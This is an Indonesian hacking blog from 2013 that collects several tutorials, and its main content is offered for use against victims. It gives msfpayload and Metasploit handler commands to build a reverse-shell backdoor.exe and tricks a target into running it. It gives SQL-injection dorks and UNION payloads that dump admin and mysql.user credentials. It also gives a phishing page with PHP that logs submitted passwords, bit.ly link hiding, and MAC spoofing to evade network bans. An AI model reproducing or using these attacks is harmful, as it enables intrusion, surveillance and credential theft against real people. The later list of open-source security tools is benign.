Rabu, 02 Oktober 2013

Cara mengendalikan komputer orang lain menggunakan backtrack

Dalam tutorial ini saya akan mengeksploitasi Windows 7 Sp1 OS menggunakan Metasploit. saya akan menggunakan mengeksploitasi / multi / handler modul yang "memberikan semua fitur dari sistem payload Metasploit untuk eksploitasi yang telah diluncurkan di luar kerangka"
Sebelum kita jalankan Metasploit, kita perlu menciptakan muatan untuk mendapatkan shell meterpreter. Untuk membuat jenis payload ini di terminal

msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe

 Saya menggunakan Port 4444 (Anda dapat memilih port Anda sendiri) untuk LPORT yang mendengarkan port dan mengatur LHOST ke IP penyerang jarak jauh yang jelas alamat IP lokal Anda, IP saya adalah

Setelah itu, Anda harus dapat melihat file bernama sebagai backdoor.exe di / root. Mengirim file ke Slave dengan menggunakan keterampilan Rekayasa Sosial Anda dan biarkan dia klik file tersebut. Anda dapat mengubah nama file sehingga tidak jelas.

Peluncuran Metasploit dan mengatur exploit dengan mengetikkan perintah ini di msfconsole Anda:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost
set lport 4444

 Jika semua berjalan dengan baik, Anda harus dapat membuat sesi meterpreter. Ketik sysinfo untuk mengumpulkan beberapa info pada mesin. Untuk mengetahui perintah lain untuk meterpreter jenis bantuan. Ada juga perintah meterpreter lain seperti menangkap screenshot dari PC, merekam keystrokes, menangkap snapshot dari webcam, dll Untuk memasukkan perintah shell dari mesin, tipe shell.

Terima kasih! Atas Suhu


Cara hacking menggunakan SQLI injection


Pertama kita harus menemukan website target kami untuk melakukan itu Anda dapat menggunakan ini "dorks".
Saya akan memberikan beberapa Dorks sini menyalin siapa pun itu dan paste di google dan pencarian.

inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurl:play_old.php?id= inurl:declaration_more.php?decl_id= inurl:pageid=inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id=

2). Periksa kerentanan

Mari kita mengatakan bahwa kita memiliki beberapa situs seperti ini


Sekarang untuk menguji apakah adalah vulrnable kita menambahkan ke akhir url '


adi jika kita mendapatkan beberapa error seperti
"Anda memiliki kesalahan dalam sintaks SQL Anda, periksa manual yang sesuai dengan Anda MySQL Server versi untuk dll benar .."
atau sesuatu yang serupa

yang berarti rentan terhadap sql injection

 3). Tentukan jumlah kolom

Untuk menemukan jumlah kolom kita menggunakan pernyataan ORDER BY (menceritakan database yang cara memesan hasilnya)
jadi bagaimana menggunakannya? Yah hanya incrementing nomor sampai kita mendapatkan error.

http://www.site.com/news.php?id=4 order by 1/* <-- no error  
http://www.site.com/news.php?id=4 order by 2/* <-- no error
http://www.site.com/news.php?id=4 order by 3/* <-- no error
http://www.site.com/news.php?id=4 order by 4/*

kesalahan pada order by 4 (kita mendapatkan pesan seperti ini tidak diketahui kolom '4 'in' agar klausul 'atau sesuatu seperti itu)
itu berarti bahwa ia memiliki 3 kolom, karena kita punya kesalahan pada 4.

4). Periksa fungsi UNION

Dengan persatuan kita dapat memilih lebih banyak data dalam satu pernyataan sql.
jadi kita harus

http://www.site.com/news.php?id=4 union all select 1,2,3/*  

 (kita sudah menemukan bahwa jumlah kolom adalah 3 di bagian 2). )
jika kita melihat beberapa nomor di layar, yaitu 1 atau 2 atau 3 maka UNION bekerja

5). Periksa versi MySQL
http://www.site.com/news.php?id=4 serikat semua pilih 1,2,3 / *

CATATAN: jika / * tidak bekerja atau Anda mendapatkan beberapa error, kemudian coba - itu komentar dan sangat penting bagi query kita untuk bekerja dengan baik.

Katakanlah bahwa kita memiliki nomor 2 di layar, sekarang untuk memeriksa versi
kita ganti nomor 2 dengan @ @ version atau version () dan mendapatkan someting seperti 4.1.33-log atau 5.0.45 atau mirip.

seharusnya terlihat seperti ini

http://www.site.com/news.php?id=4 union all select 1,@@version,3/* 

Anda mendapatkan error "union + campuran ilegal collations (IMPLISIT + yg dpt dipaksa) ..."
saya tidak melihat kertas yang mencakup masalah ini, jadi saya harus menulis itu
apa yang kita butuhkan adalah mengkonversi () fungsi


http://www.site.com/news.php?id=4 union all select 1,convert(@@version using latin1),3/*

atau dengan hex ​​() dan unhex ()

http://www.site.com/news.php?id=4 union all select 1,unhex(hex(@@version)),3/*

dan Anda akan mendapatkan versi MySQL

 6). Mendapatkan meja dan nama kolom

baik jika versi MySQL adalah <5 (yaitu 4.1.33, 4.1.12 ...) <--- nanti saya akan menjelaskan untuk MySQL> 5 versi.
kita harus menebak table dan nama kolom dalam banyak kasus.

nama tabel umum adalah: user / s, admin / s, member / s ...

nama kolom umum adalah: username, user, usr, user_name, password, lulus, passwd, pwd dll ..

i.e akan

http://www.site.com/news.php?id=4 union all select 1,2,3 from admin/*

(kita lihat nomor 2 pada layar seperti sebelumnya, dan itu bagus)
kita tahu bahwa meja admin ada ...
sekarang untuk memeriksa nama kolom.

http://www.site.com/news.php?id=4 union all select 1,username,3 from admin/* 

(jika anda mendapatkan error, kemudian coba nama kolom lainnya)

kita mendapatkan username ditampilkan di layar, misalnya akan admin, atau superadmin dll ..
sekarang untuk memeriksa apakah ada kolom password

http://www.site.com/news.php?id=4 union all select 1,password,3 from admin/* 

(jika anda mendapatkan error, kemudian coba nama kolom lainnya)
kita lihat password pada layar di hash atau plain-text, itu tergantung dari bagaimana database diatur

i.e md5 hash, mysql hash, sha1 ...

sekarang kita harus menyelesaikan query untuk terlihat bagus

untuk itu kita dapat menggunakan concat () fungsi (itu bergabung string)


http://www.site.com/news.php?id=4 union all select 1,concat(username,0x3a,password),3 from admin/*

Perhatikan bahwa saya menempatkan 0x3a, nilai hex untuk: (jadi 0x3a adalah nilai hex usus)

(ada cara lain untuk itu, char (58), nilai ascii untuk:)

http://site.com/news.php?id=4 union all select 1,concat(username,char(58),password),3 from admin/*

sekarang kita akan mendapatkan hasil nama pengguna: sandi pada layar, yaitu admin: admin atau admin: somehash
ketika Anda memiliki ini, Anda bisa login seperti admin atau superuser
jika tidak dapat menebak nama tabel yang tepat, Anda selalu dapat mencoba mysql.user (default)
memiliki pengguna i kolom password, jadi contoh akan

http://www.site.com/news.php?id=4 union all select 1,concat(user,0x3a,password),3 from mysql.user/*  

7). MySQL 5

Seperti saya katakan sebelumnya aku akan menjelaskan bagaimana untuk mendapatkan tabel dan nama kolom
di MySQL> 5.
Untuk ini kita perlu information_schema. Ini memegang semua tabel dan kolom dalam database.
untuk mendapatkan tabel kita menggunakan table_name dan information_schema.tables.

http://www.site.com/news.php?id=4 union all select 1,table_name,3 from information_schema.tables/*

di sini kita mengganti nomor 2 kita dengan table_name untuk mendapatkan tabel pertama dari 
information_schema.tables ditampilkan pada layar. Sekarang kita harus menambahkan LIMIT di akhir query 
untuk daftar semua tabel.

 http://www.site.com/news.php?id=4 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

perhatikan bahwa saya menempatkan 0,1 (dapatkan 1 hasil mulai dari 0?)
sekarang untuk melihat tabel kedua, kita mengubah batas 0,1 untuk membatasi 1,1

 http://www.site.com/news.php?id=4 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

tabel kedua ditampilkan.
untuk tabel ketiga kami menempatkan batas 2,1

http://www.site.com/news.php?id=4 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

terus incrementing sampai Anda mendapatkan beberapa yang berguna seperti db_admin, poll_user, auth, auth_user dll ..

Untuk mendapatkan nama kolom metode adalah sama.

di sini kita menggunakan nama_kolom dan information_schema.columns

metode yang sama seperti di atas sehingga contoh akan

 http://www.site.com/news.php?id=4 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

 kolom pertama diplayed.

yang kedua (kita mengubah batas 0,1 untuk membatasi 1,1)


http://www.site.com/news.php?id=4 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

kolom kedua ditampilkan, jadi tetap incrementing sampai Anda mendapatkan sesuatu seperti

nama pengguna, pengguna, login, password, lulus, passwd dll ..
jika Anda ingin nama kolom tampilan untuk tabel tertentu menggunakan query ini. (mana klausa)
mari kita mengatakan bahwa kita menemukan pengguna meja.

http://www.site.com/news.php?id=4 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

 sekarang kita bisa ditampilkan nama kolom dalam tabel pengguna. Hanya menggunakan LIMIT kita bisa daftar semua kolom dalam tabel pengguna.

Catatan bahwa ini tidak akan bekerja jika tanda kutip ajaib ON.
mari kita mengatakan bahwa kita menemukan colums user, pass, dan email.
sekarang untuk menyelesaikan query untuk menempatkan mereka semua bersama-sama
untuk itu kita menggunakan concat (), i decribe itu sebelumnya.

http://www.site.com/news.php?id=4 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

 apa yang kita dapatkan di sini adalah pengguna: pass: email dari pengguna meja.
contoh: admin: hash: whatever@blabla.com

Sumber: Wikipedia, Google, forum hack dan lain-lain
Kredit untuk semua orang yang berhak menerimanya

 terimakasih see ya

Cara membuat Phising Web

Hei teman. Hari ini saya memberitahu Anda bagaimana untuk membuat website phishing, cara menaruhnya online dan bagaimana untuk menyembunyikan link dari website phishing Anda.

Anda perlu NotePad, yang tidak akan menjadi masalah jika Anda memiliki Windows;) dan Anda membutuhkan webhoster gratis.

# Buat file notepad dan menyebutnya index.html Jadilah carful huruf harus lebih rendah!

# Kunjungi website Anda ingin palsu dan pergi ke log dalam bagian.

# Tekan tombol mouse kanan dan klik pada melihat sumber halaman

    Kopi segalanya untuk index.html

Sejauh ini cukup baik. Sekarang Anda memiliki halaman lubang di dokumen Anda.

# Tekan control + F dan cari kata: action
    Jika Anda menemukannya menghapus URL lubang di belakang kata action. Becarful hanya URL!
    Sekarang Anda mengisi post.php dan menyimpan file sebagai index.html.

  Menguji file html dan Anda akan melihat Anda punya halaman login.

# Buka file notepad baru dan salin berikut. Jangan lupa untuk mengetikkan URL dari situs yang ingin Anda palsu!


Header('Location:  http://www.type in the url of the website.com');

$handle = fopen("pwd.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

 # Simpan sebagai post.php

Sekarang Anda memiliki php dan file html. Jadi Anda memiliki semua yang Anda butuhkan.

# Gunakan google untuk menemukan webhoster gratis dan mendaftar secara gratis. Ikuti semua langkah dan Anda akan mendapatkannya easylie. Sering kali Anda harus menunggu 24 jam untuk mengaktifkan.

   Tidak peduli yang webhoster Anda gunakan.

# Jika halaman Anda activatet pergi ke panel kontrol dan mencari manajer file opsi panggilan itu.
    Sekarang upload. Html dan php file..

# Periksa URL Anda dan Anda akan melihat situs web phising. #

Jika seseorang mencoba untuk login di situs Phising Anda mendapatkan file baru di panel kontrol Anda disebut username.txt atau sesuatu. Buka dan Anda mendapatkan nama pengguna + lulus.

Jadi Anda ingin mengirim URL kepada korban tetapi link terlalu aneh?

# Buka bit.ly dan masuk untuk mendapatkan akun gratis.

# Kopi link Anda dari situs phishing untuk kotak URL mempersingkat dan klik customize. Sekarang Anda dapat mengubah URL dan membuatnya lebih dapat dipercaya.

sekian dari saya Mr.kamikaze

cara mengedit Script

1 buka dulu scrip yang ingin anda edit boss contoh siapkan note pad..
2 siapkan sript yang ingin di edit dengan .html agar lebih mudah gan

3.setelah itu geser scriptnya tadi ke notepad dan akan ada muncul banyak script

maaf soal gambar :p eheh okeke sekarang lanjut jika anda ingin mengedit title nya coba cari script

<meta name="description" content=
<title> atau apalah 

jika ingin mengganti judul pada srip itu contoh

kamu tinggal mencari saja namanya yang ada pada text contoh fatahillah setelah itu kamu ganti

dan jika kamu ingin mengganti kata2 nya kamu tinggal cari kata2nya saja ngak usah2 susah tinggal scrool di bawah sja udah dapat tuh :3


jika sudah dapat di ganti aja Ingat perhatikan tanda <br> dan </br> itu gunanya sebagai spasi atau jarak gan :3 

4.jika ingin mengganti tulisan berjalan atau apalah kamu tinggal mencari code  <marquee> atau </marquee>
trus edit dah tulisan di bawahnya 
5.jika anda ingin menggati foto pada scripnya contoh <img src= cari kode tersebut

6 jika ingin mendapat link foto anda tinggal cari dlu foto yg ingin di pasang 
1.cari foto dlu
2.klik foto tersebut
3klik kanan dan cari view image maka akan muncul sperti gambar di atas lalu pastekan di note pad anda :3

4.save .html dan lihat sendiri dah

Selasa, 01 Oktober 2013

Cara mengganti mac Address pada Windows

Salah satu tujuan seseorang untuk mengganti Mac Address adalah karena berbuat usil pada jaringan komputer kampus atau kantor seperti Suka membuka situs porno, suka gonta-ganti IP Address, dll, sehingga diblok akses internetnya pada jaringan. Selain itu, bisa juga untuk hacking wireless hotspot yang sekuritinya menggunakan Mac Address Filter, jika Mac Address-nya sudah diketahui.


Berikut Langkah-langkah Mengganti Mac Address pada Sistem Operasi Windows XP:

1. Klik Tombol Start | Control Panel | Network Connections
2. Klik-kanan icon Network interface LAN/WLAN yang ingin diganti Mac Address-nya lalu klik Properties.

3. Kemudian, klik tombol Configure

4. Setelah itu pilih tab Advanced

Finish :) silahkan ganti dengan mac Address yg anda mau , 

menghapus folder error pada system

emarin seriing temuin folder di PC yang tidak bisa di hapus, salah satunya .Trash-1000/.Trash-1001 akibat pakek backtrack, dan kemarin muter2 di google ketemu dech ne software, dan akhir a bisa juga hapus tu folder,,
cara kerja a gampang banget dan ukuran file a tidak besar

tinggal pilih folder yang tidak bisa di hapus, klik kanan dan pilih unlocker

Membuat tampilan desktop menjadi 3D

ni untuk semuanya...
dengan Real Desktop kita bisa main² di Desktop kita..
seperti rumah sendiri..

65 Open Source Replacements for Security Software

Assalamu'alaikum Wr Wb :hi:

ketemu agy ma ane : Mr.kamikaze

gak usah banyak cingcong dh :





Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway

The self-proclaimed "absolute best SPAM fighting weapon that the world has ever known," ASSP sits on your SMTP servers to stop spam and scan for viruses. Features include browser-based setup, support for most SMTP servers, automatic whitelists, early sender verification, Bayesian filters and more. Operating System: OS Independent.

2. MailScanner

Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway

Downloaded more than 1.3 million times by users in 225 countries, MailScanner is a free e-mail security package for mail servers. It incorporates SpamAssassin, ClamAV and a number of other tools to block spam and malware. Operating System: OS Independent.

3. SpamAssassin

Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway

"The powerful #1 open-source spam filter," SpamAssassin uses header and text analysis, Bayesian filtering, DNS blocklists, collaborative filtering databases and other techniques to block spam. The project is managed by the Apache Foundation, and it's been incorporated into a number of other open source and commercial products. Operating System: primarily Linux and OS X, although Windows versions are available.

4. SpamBayes

Replaces: Barracuda Spam and Virus Firewall, SpamHero, Abaca Email Protection Gateway

As you might guess from the name, this project offers a group of Bayesian filters for blocking spam. The site includes versions for Outlook, Outlook Express, Windows Live Mail, IncrediMail, Thunderbird, Gmail, Yahoo Mail and others. Operating System: OS Independent.


5. Nixory

Replaces: SpyBot Search and Destroy, AdAware

Nixory removes and block malicious tracking cookies (aka, spyware) from your system. It supports Mozilla Firefox, Internet Explorer and Google Chrome, and it won't slow your system while you surf. Operating System: OS Independent.


6. ClamAV

Replaces Avast! Linux Edition, VirusScan Enterprise for Linux

This tremendously popular anti-virus engine has been incorporated into numerous security products and calls itself "the de facto standard for mail gateway scanning." The open source version runs on UNIX or Linux mail servers, but the website also offers a version called Immunetfor individual Windows PCs. Operating System: Linux.

7. ClamTK

Replaces Avast! Linux Edition, VirusScan Enterprise for Linux

ClamTK makes ClamAV a little bit easier to use by providing a graphical interface for the anti-virus engine. Like the original, this one runs on Linux and scans on demand. Operating System: Linux.

8. ClamWin Free Antivirus

Replaces Kaspersky Anti-Virus, McAfee AntiVirus Plus, Norton Anti-Virus

Based on ClamAV, ClamWin protects more than 600,000 PCs from viruses and malware. Note that unlike most commercial anti-virus packages, ClamWin does not offer an on-access real-time scanner; in order to scan incoming files, you'll need to save them and then run a scan manually before opening or running the files. Operating System: Windows.

9. P3Scan

Replaces Avast! Linux Edition, VirusScan Enterprise for Linux

With P3Scan, you can set up a transparent proxy server that provides anti-virus and anti-spam protection. Operating System: Linux.


10. Amanda

Replaces: Simpana Backup and Recovery , NetVault, HP StorageWorks EBS

Protecting more than 500,000 systems worldwide, Amanda lays claim to the title "most popular open source backup and recovery software in the world." In addition to the community version, it's also available in a supported enterprise edition or as an appliance. Operating System: Windows, Linux, OS X.

11. Areca Backup

Replaces: NovaBackup

Aiming for a balance between simplicity and versatility, Areca offers an easy graphical interface with many options for creating and interacting with archived files. Key features include compression, encryption, delta backup support, archive merges and more. Operating System: Windows, Linux.

12. Bacula

Replaces: Simpana Backup and Recovery , NetVault, HP StorageWorks EBS

Designed for enterprise users, Bacula backs up multiple systems across a network. Commercial support and services for the popular product are available through Bacula Systems. Operating System: Windows, Linux, OS X.

13. Clonezilla

Replaces: Norton Ghost

Created as an alternative to Ghost, Clonezilla can clone single or multiple systems very quickly. It comes in two versions: Clonezilla Live for individual systems and Clonezilla SE for massive networks. Operating System: Windows, Linux, OS X.

14. Partimage

Replaces: Norton Ghost, NovaBackup, McAfee Online Backup, Carbonite.com

Partimage can create a complete image of your system, which is useful if you need to recover from a full system crash or if you want to configure multiple systems with exactly the same software. It can also create a recovery partition on your drive. Operating System: Linux.

15. Redo

Replaces: Norton Ghost, NovaBackup, McAfee Online Backup, Carbonite.com

Calling itself the "easiest, most complete disaster recovery solution available," Redo offers backup, restore and bare-metal recovery capabilities. Even in the most severe emergencies where you must completely replace a drive, Redo claims it can get you back up and running with all of your programs and files in just 10 minutes. Operating System: Linux.


16. Chromium

Replaces: Microsoft Internet Explorer

The open source version of Google Chrome, Chromium tends to be faster and more secure than competing browsers. Key security features include sandboxing, automatic updates, SafeBrowsing and more. Operating System: Windows, Linux, OS X.

17. Dooble

Replaces: Microsoft Internet Explorer

Dooble's developers have created this newer browser with an eye on safety and ease of use. Unlike most other browsers, it automatically encrypts all traffic for greater privacy and security. Operating System: Windows, Linux, OS X.

18. Tor

Replaces: Microsoft Internet Explorer

Tor protects your identity by providing anonymity while you browse the Web. It's used by journalists, activists, whistle-blowers and others concerned that someone might be snooping on their online activities. Operating System: Windows, Linux, OS X.

Browser Add-Ons

19. Web Of Trust (WOT)

Replaces: McAfee SiteAdvisor Plus

Downloaded more than 33 million times, this popular add-on for Firefox, Internet Explorer, Chrome, Safari or Opera lets users know when they've strayed into websites that are questionable or insecure. It utilizes user ratings to identify sites that perpetuate scams, collect personal information or include unsuitable content, and it ranks them with a green-yellow-red classification system. Operating System: Windows, Linux, OS X.

20. Password Maker

Replaces Kaspersky Password Manager, Roboform

Using the same password all the time puts you at risk, but many people do it anyways because it's so difficult to remember a lot of different passwords. This browser add-on offers a better solution for the problem by creating unique passwords for each site you visit and storing them in an encrypted file that you access with a single master password. Operating System: Windows, Linux, OS X.

Data Removal

21. BleachBit

Replaces Easy System Cleaner

This helpful utility cleans up your system to protect your privacy and improve performance. It frees up disk space by cleaning junk from more than 90 applications, erasing temporary files, deleting cache and browsing history, and "shredding" unwanted files. Operating System: Windows, Linux.

22. Eraser

Replaces BCWipe Enterprise

Like BleachBit, Eraser "shreds" deleted files so that they cannot be recovered. It helps protect sensitive information by rewriting over deleted files several times with random data. Operating System: Windows

23. Wipe

Replaces BCWipe Enterprise

Wipe offers the same functionality as Eraser, but it's for Linux instead of Windows. The site also offers a wealth of information for those interested in learning more about how file "shredding" works. Operating System: Linux.

24. Darik's Boot And Nuke

Replaces Kill Disk, BCWipe Total WipeOut

While Eraser and Wipe delete single files, DBAN securely deletes entire disks. It's very helpful when donating or disposing of an old system. Operating System: OS Independent.

Data Loss Prevention

25. OpenDLP

Replaces RSA Data Loss Prevention Suite, CheckPoint DLP Software Blade, Symantec Data Loss Prevention Product Family

OpenDLP is a "agent- and agentless-based, centrally-managed, massively distributable data loss prevention tool." It allows security or compliance managers to scan thousands of systems simultaneously via agents or perform agentless data discovery against a MySQL or Microsoft SQL server. Operating System: Windows.

26. MyDLP

Replaces RSA Data Loss Prevention Suite, CheckPoint DLP Software Blade, Symantec Data Loss Prevention Product Family

MyDLP can block credit card numbers, social security numbers, or sensitive files from being transmitted via e-mail, printers, the Web or removable devices. In addition to the free community version, it also comes in a paid enterprise version. Operating System: Windows, Linux, VMware.


27. AxCrypt

Replaces McAfee Anti-Theft, CryptoForge

With nearly 2.5 million registered users, AxCrypt claims to be the "leading open source file encryption software for Windows." It integrates with Windows Explorer—to use it, you simply right-click to encrypt a file or double-click to decrypt. Operating System: Windows.

28. Gnu Privacy Guard

Replaces PGP Universal Gateway Email Encryption

This Gnu project is a command-line implementation of the popular OpenPGP encryption standard. It supports ElGamal, DSA, RSA, AES, 3DES, Blowfish, Twofish, CAST5, MD5, SHA-1, RIPE-MD-160 and TIGER encryption algorithms. Operating System: Linux.

29. GPGTools

Replaces PGP Universal Gateway Email Encryption

Mac users can download this version of GPG for a more user-friendly way to encrypt e-mail and files. The website includes quite a bit of help and tutorials for new users, which make it even easier to get started using the app. Operating System: OS X.

30. gpg4win

Replaces Cypherus

And this version offers GPG for Windows users, complete with a GUI. It installs quickly and easily, and it protects both files at rest and mail messages. Operating System: Windows.

31. PeaZip

Replaces WinZip

While it's really a compression utility not an encryption tool, PeaZip also offers strong encryption capabilities, which is why we included it in this section of the list. It also includes two-factor authentication capabilities and secure deletion. Operating System: Windows, Linux.

32. Crypt

Replaces McAfee Anti-Theft, CryptoForge

At just 44KB, Crypt is one of the lightest weight encryption utilities available. And because it can encrypt 3MB worth of data in just 0.7 seconds, it's also one of the fastest. However, it doesn't have a GUI, so you'll need to be comfortable with the command line in order to use it. Operating System: Windows.

33. NeoCrypt

Replaces McAfee Anti-Theft, CryptoForge

NeoCrypt supports multiple encryption algorithms, including AES, DES, Triple-DES, IDEA, RC4, RC5, CAST-128, BlowFish, SkipJack. It runs from an easy-to-use GUI, and it also integrates with the Windows Shell so that you can encrypt and decrypt files right from Windows Explorer. Operating System: Windows.

34. LUKS/cryptsetup

Replaces PGP Whole Disk Encryption

Short for "Linux Unified Key Setup," LUKS calls itself "the standard for Linux hard disk encryption." While many of the other apps on our list encrypt files one by one, LUKS encrypts your entire drive. Operating System: Linux.

35. FreeOTFE

Replaces PGP Whole Disk Encryption

Like LUKS, this app encrypts an entire drive. With it you can create and encrypt virtual disks on your hard drive. It's also highly portable and can run from a thumb drive. Operating System: Windows.

36. TrueCrypt

Replaces PGP Whole Disk Encryption

One of the most popular open source disk encryption options, TrueCrypt boasts more than 22 million downloads. Thanks to parallelization and pipelining technology, it offers fast reads and writes 0f encrypted information. Operating System: Windows.

Secure File Transfer

37. WinSCP

Replaces CuteFTP, FTP Commander

Extremely popular, the award-winning WinSCP includes an SFTP client, SCP client, FTPS client and FTP client. It offers two different interfaces and also includes an integrated text editor. Operating System: Windows.

38. FileZilla

Replaces CuteFTP, FTP Commander

While WinSCP offers only a client version, FileZilla offers both a client version and a version that allows you to set up your own FTP server. It supports FTP, FTPS and SSH transfer protocol. Operating System: Windows, Linux, OS X.



Replaces EnCase Forensics, X-ways Forensics, AccessData Forensic Toolkit

The Open Digital Evidence Search and Seizure Architecture, aka "ODESSA," offers several different tools that for examining and reporting on digital evidence. This is an older project, but still valuable. Operating System: Windows, Linux, OS X.

40.The Sleuth Kit/Autopsy Browser

Replaces EnCase Forensics, X-ways Forensics, AccessData Forensic Toolkit

These two apps work together: The Sleuth Kit offers command line tools for conducting digital investigations, and Autopsy Browser offers a browser-based GUI for accessing those tools. The project also now includes a Hadoop framework for large-scale data analysis. Operating System: Windows, Linux, OS X.

Gateway/Unified Threat Management Appliances

41. Endian Firewall Community

Replaces: Check Point Security Gateways, SonicWall, Symantec Web Gateway

Endian Firewall Community can turn any PC (including pretty old ones) into a gateway security appliance complete with a firewall, application-level proxies with antivirus support, virus and spam-filtering for email, Web content and a VPN. Supported versions of the software and hardware appliances are also available on the site. Operating System: Linux.

42. Untangle Lite

Replaces: Check Point Security Gateways, SonicWall, Symantec Web Gateway

Similar to Endian, Untangle Lite also helps users create their own gateway security appliances. In addition, Untangle offers commercial products, and you can download each of the individual apps included in Untangle Lite (firewall, intrusion prevention, attack blocker, etc.) separately. Operating System: Linux.

43. ClearOS

Replaces: Check Point Security Gateways, SonicWall, Symantec Web Gateway

ClearOS combines gateway security functionality with the capabilities of a small business server. It offers networking, groupware, a mail server, a Web server and more. Paid support and hardware are also available. Operating System: Linux.

Intrusion Detection

44. Open Source Tripwire

Replaces Tripwire

Standard Tripwire is now a closed source project, but the community has continued developing the open source version released in 2000. It monitors the content of files and alerts network managers when those files have changed, alerting them to possible intrusions. Operating System: Windows, Linux.


Replaces Corero IPS, < ahref="http://www.hpenterprisesecurity.com/products/hp-tippingpoint-network-security/">HP Tipping Point IPS, Sophos HIPS

In addition to file integrity checking, OSSEC also performs log analysis, policy monitoring, rootkit detection and real-time alerting to help prevent and detect intrusions into your network. It's downloaded more than 5,000 times per month and has won numerous awards. Operating System: Windows, Linux.


Replaces Tripwire

AFICK, short for "Another File Integrity Checker," offers similar functionality as Tripwire. It's portable, fast and runs from a GUI or the command line. Operating System: Windows, Linux.

47. Snort

Replaces Corero IPS, < ahref="http://www.hpenterprisesecurity.com/products/hp-tippingpoint-network-security/">HP Tipping Point IPS, Sophos HIPS

With millions of downloads and more than 400,000 registered users, Snort claims to be "the most widely deployed IDS/IPS technology worldwide." Operating System: Windows, Linux OS X.

Network Firewalls

48. IPCop

Replaces Barricuda NG Firewall, Check Point Appliances

Like most of the other apps on our Firewall list, IPCop turns a PC into a Linux-based firewall to protect your network. This one is designed for home or SOHO users, and it boasts an easy-to-use Web interface. Operating System: Linux.

49. Devil-Linux

Replaces Barricuda NG Firewall, Check Point Appliances

Although it was originally designed to offer firewall and router functionality, Devil-Linux can also operate as a server for many applications, including mail hosting. Created by IT administrators for IT administrators, it boasts top-notch security and excellent customization capabilities. Operating System: Linux.

50. Turtle Firewall

Replaces Barricuda NG Firewall, Check Point Appliances

Designed to be simple and fast, Turtle allows network managers to configure it via a Web interface or by modifying XML files. The website also includes some good introductory information on the nature of firewalls. Operating System: Linux.

51. Shorewall

Replaces Barricuda NG Firewall, Check Point Appliances

Shorewall doesn't claim to be the easiest Linux firewall to use, but it does claim to be "the most flexible and powerful." You can use it on a system functioning as a dedicated firewall, as a multi-function gateway/router/server or as a standalone GNU/Linux PC. Operating System: Linux.

Network Firewalls (continued from previous page)

52. Vuurmuur

Replaces Barricuda NG Firewall, Check Point Appliances

Vuurmuur is designed to be both simple and powerful. In addition to standard firewall capabilities, it also supports traffic shaping and offers advanced monitoring capabilities. Operating System: Linux.

53. M0n0wall

Replaces Barricuda NG Firewall

Although it was designed for embedded PCs and appliance, m0n0wall can also run on a standalone PC running FreeBSD. It requires less than 12MB of space and boots in less than 25 seconds. Operating System: FreeBSD.

54. pfSense

Replaces Barricuda NG Firewall, Check Point Appliances

This m0n0wall fork is also based on BSD, but is designed for regular computers, not embedded hardware. It's been downloaded more than 1 million times and currently runs on more than 100,000 networks, including large corporations and universities as well as small home networks. Operating System: FreeBSD.

55. Vyatta

Replaces Cisco products

The "core" Vyatta software allows users to make their own firewalls/networking appliances and routers. The company also offers paid software and hardware. Operating System: Linux.

Network Monitoring

56. Wireshark

Replaces: OmniPeek, CommView

Calling itself the "world's foremost network protocol analyzer," Wireshark makes it easy to capture and analyze network traffic. Commercial products and services related to the software are available through Riverbed Technology. Operating System: Windows, Linux, OS X.

57. Tcpdump/libpcap

Replaces: OmniPeek, CommView,

Tcpdump is a command line packet analyzer, and libpcap is a C/C++ library for network traffic capture. Working together, the two provide a good network monitoring solution, but, lacking a GUI, they are not particularly user-friendly. Operating System: Linux.

58. WinDump

Replaces: OmniPeek, CommView

Managed by Riverbed Technology (which also owns Wireshark), WinDump ports tcpdump to the Windows platform. This site also includes the WinPcap library and drivers for traffic capture. Operating System: Windows.

Password Crackers

59. Ophcrack

Replaces Access Data Password Recovery Toolkit, Passware

From time to time, everyone needs to recover a lost or unknown password. This password cracker uses the rainbow tables method to recover unknown passwords, and it also includes a brute force module for simple passwords. Operating System: Windows.

60. Access Data Password Recovery Toolkit, Passware

John the Ripper is particularly good at cracking weak passwords, but in order to use it, you'll need a list of commonly used passwords. You can buy password lists or a pro version of the software from the same site. Operating System: Windows, Linux, OS X.

Password Management

61. KeePass Password Safe

Replaces Kaspersky Password Manager

This popular password manager stores all of your passwords in an encrypted database. You'll only need to remember one master password, while this easy-to-use, lightweight app helps protect you from identity thieves. Operating System: Windows.

62. KeePassX

Replaces Kaspersky Password Manager

If you use OS X or Linux, try this fork of KeePass. Plus, it adds a few features not in the original and runs on Windows as well. Operating System: Windows, Linux, OS X.

63. Password Safe

Replaces Kaspersky Password Manager

Downloaded more than 1 million times, Password Safe is another popular open source option for protecting your passwords. Like KeePass, it's lightweight and stores your encrypted passwords in a database so that you only need to recall one master password. Operating System: Windows.

User Authentication


Replaces Entrust IdentityGuard, Vasco Digipass, RSA's SecurID

WiKID boasts "two-factor authentication without the hassle factor." In addition to the free community version, it also comes in a supported enterprise version which also adds additional functionality. Operating System: OS Independent.

Web Filtering

65. DansGuardian

Replaces McAfee Family Protection

NetNanny, CyberPatrol

This award-winning content filter uses phrase matching, PICS filtering, URL filtering and other methods to block objectionable content. Note that this software does not run on individual PCs; it runs on an OS X or Linux server to protect the rest of your network. Operating System: Linux, OS X.

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